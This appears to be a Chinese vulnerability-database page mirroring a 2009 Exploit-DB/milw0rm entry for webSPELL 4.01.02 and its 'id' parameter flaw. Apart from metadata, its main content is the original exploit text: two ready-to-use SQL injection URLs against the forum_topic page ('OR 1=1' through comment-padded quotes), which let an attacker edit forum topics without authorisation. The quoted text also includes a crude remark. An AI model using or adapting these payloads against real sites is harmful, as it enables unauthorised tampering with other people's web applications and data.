webSPELL 4.01.02 - 'id' Remote Edit Topics

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057218 漏洞类型
发布时间 2009-01-04 更新时间 2009-01-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7657
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
|  webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability  |      Note       |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it              | magic quotes 0  |       
| download on http://wesbpell.org                             | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Exploit                                                                       |
| index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/*    |
| index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/*       |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=+
                | http://www.youtube.com/watch?v=SY1SwqLOC3c |
                +--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+

# milw0rm.com [2009-01-04]